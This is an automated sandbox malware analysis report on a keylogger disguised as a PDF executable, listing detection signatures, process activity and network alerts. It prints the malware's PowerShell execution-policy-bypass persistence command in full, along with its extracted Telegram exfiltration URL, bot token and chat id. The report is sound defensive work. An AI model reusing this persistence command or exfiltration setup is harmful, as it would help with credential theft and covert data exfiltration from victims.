Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PDF-3093900299039 pdf.exe

Overview

General Information

Sample name:PDF-3093900299039 pdf.exe
Analysis ID:1589962
MD5:1f74495f02ad58ff437b07cf58a3e0ad
SHA1:9efd59d289256116e9f539ffd7cc319603ac03ba
SHA256:cd7aa2bca4b3612823b7e73160896e886a3e3ddd495c3ae7f2b47868c5dff0cf
Tags:exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PDF-3093900299039 pdf.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)
    • powershell.exe (PID: 3260 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PDF-3093900299039 pdf.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)
  • svchost.exe (PID: 5856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • audiomaximizer.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)
    • powershell.exe (PID: 7432 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • audiomaximizer.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe" MD5: 1F74495F02AD58FF437B07CF58A3E0AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat id": "7437481970"}
{"Exfil Mode": "Telegram", "Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat_id": "7437481970", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x6e8d1:$x1: In$J$ct0r
00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 20 entries
          SourceRuleDescriptionAuthorStrings
          3.2.PDF-3093900299039 pdf.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x2f16a:$s1: UnHook
          • 0x2f171:$s2: SetHook
          • 0x2f179:$s3: CallNextHook
          • 0x2f186:$s4: _hook
          0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6cad1:$x1: In$J$ct0r
          0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6cad1:$x1: In$J$ct0r
          0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6e8d1:$x1: In$J$ct0r
          0.2.PDF-3093900299039 pdf.exe.3997610.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 23 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5856, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe", ParentImage: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe, ParentProcessId: 4268, ParentProcessName: PDF-3093900299039 pdf.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe', ProcessId: 3260, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T12:08:11.496106+010028033053Unknown Traffic192.168.2.449735104.21.32.1443TCP
            2025-01-13T12:08:12.958118+010028033053Unknown Traffic192.168.2.449738104.21.32.1443TCP
            2025-01-13T12:08:22.862735+010028033053Unknown Traffic192.168.2.449755104.21.32.1443TCP
            2025-01-13T12:08:22.885124+010028033053Unknown Traffic192.168.2.449756104.21.32.1443TCP
            2025-01-13T12:08:27.383740+010028033053Unknown Traffic192.168.2.449767104.21.32.1443TCP
            2025-01-13T12:08:34.618729+010028033053Unknown Traffic192.168.2.449776104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T12:08:09.909474+010028032742Potentially Bad Traffic192.168.2.449730132.226.8.16980TCP
            2025-01-13T12:08:10.940721+010028032742Potentially Bad Traffic192.168.2.449730132.226.8.16980TCP
            2025-01-13T12:08:12.393944+010028032742Potentially Bad Traffic192.168.2.449736132.226.8.16980TCP
            2025-01-13T12:08:21.253202+010028032742Potentially Bad Traffic192.168.2.449748132.226.8.16980TCP
            2025-01-13T12:08:22.253242+010028032742Potentially Bad Traffic192.168.2.449748132.226.8.16980TCP
            2025-01-13T12:08:23.846956+010028032742Potentially Bad Traffic192.168.2.449759132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T12:08:32.634045+010018100081Potentially Bad Traffic192.168.2.449773149.154.167.220443TCP
            2025-01-13T12:08:43.414538+010018100081Potentially Bad Traffic192.168.2.449778149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T12:08:23.765386+010018100071Potentially Bad Traffic192.168.2.449760149.154.167.220443TCP
            2025-01-13T12:08:35.524227+010018100071Potentially Bad Traffic192.168.2.449777149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PDF-3093900299039 pdf.exeAvira: detected
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAvira: detection malicious, Label: HEUR/AGEN.1309800
            Source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat_id": "7437481970", "Version": "4.4"}
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U", "Chat id": "7437481970"}
            Source: audiomaximizer.exe.7556.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendMessage"}
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeVirustotal: Detection: 63%Perma Link
            Source: PDF-3093900299039 pdf.exeVirustotal: Detection: 63%Perma Link
            Source: PDF-3093900299039 pdf.exeReversingLabs: Detection: 52%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJoe Sandbox ML: detected
            Source: PDF-3093900299039 pdf.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: PDF-3093900299039 pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49752 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: PDF-3093900299039 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmp, audiomaximizer.exe, 00000005.00000002.4134302304.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbt source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 01D2F45Dh3_2_01D2F2C0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 01D2F45Dh3_2_01D2F4AC
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6B3C8h3_2_05B6AFB0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B60D0Dh3_2_05B60B30
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B61697h3_2_05B60B30
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6AE01h3_2_05B6AB50
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6E87Bh3_2_05B6E5D0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05B60673
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6E421h3_2_05B6E178
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05B60040
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6F261h3_2_05B6EFB8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05B60853
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6EE09h3_2_05B6EB60
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6F6B9h3_2_05B6F410
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6D719h3_2_05B6D470
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6B3C8h3_2_05B6B2F6
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6DFC9h3_2_05B6DD20
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6DB71h3_2_05B6D8C8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 4x nop then jmp 05B6FB11h3_2_05B6F868
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 0168F45Dh8_2_0168F2C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 0168F45Dh8_2_0168F52F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 0168F45Dh8_2_0168F4AC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 0168FC19h8_2_0168F960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0B3C8h8_2_05D0AFB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0AE01h8_2_05D0AB50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0E87Bh8_2_05D0E5D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05D00673
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0E421h8_2_05D0E178
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05D00040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0F261h8_2_05D0EFB8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0B3C8h8_2_05D0AFA2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05D00853
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0EE09h8_2_05D0EB60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D00D0Dh8_2_05D00B30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D01697h8_2_05D00B30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0D719h8_2_05D0D470
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0F6B9h8_2_05D0F410
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0B3C8h8_2_05D0B2F6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0DFC9h8_2_05D0DD20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0DB71h8_2_05D0D8C8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 05D0FB11h8_2_05D0F868
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06EDA100h8_2_06ED9E08
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED2978h8_2_06ED2680
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED1190h8_2_06ED0E98
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED4160h8_2_06ED3E68
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED5948h8_2_06ED5650
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED8919h8_2_06ED8620
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED7130h8_2_06ED6E38
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED62D8h8_2_06ED5FE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED4AF0h8_2_06ED47F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED7AC0h8_2_06ED77C8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED92A8h8_2_06ED8FB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED1FE8h8_2_06ED1CF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED4FB8h8_2_06ED4CC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED37D0h8_2_06ED34D8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED67A0h8_2_06ED64A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED7F88h8_2_06ED7C90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED9770h8_2_06ED9478
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED0800h8_2_06ED0508
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED8DE0h8_2_06ED8AE8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED1658h8_2_06ED1360
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED2E40h8_2_06ED2B48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED4628h8_2_06ED4330
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED75F8h8_2_06ED7300
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED5E10h8_2_06ED5B18
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED0338h8_2_06ED0040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED1B20h8_2_06ED1828
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED3308h8_2_06ED3010
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED0CC8h8_2_06ED09D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 4x nop then jmp 06ED3C98h8_2_06ED39A0
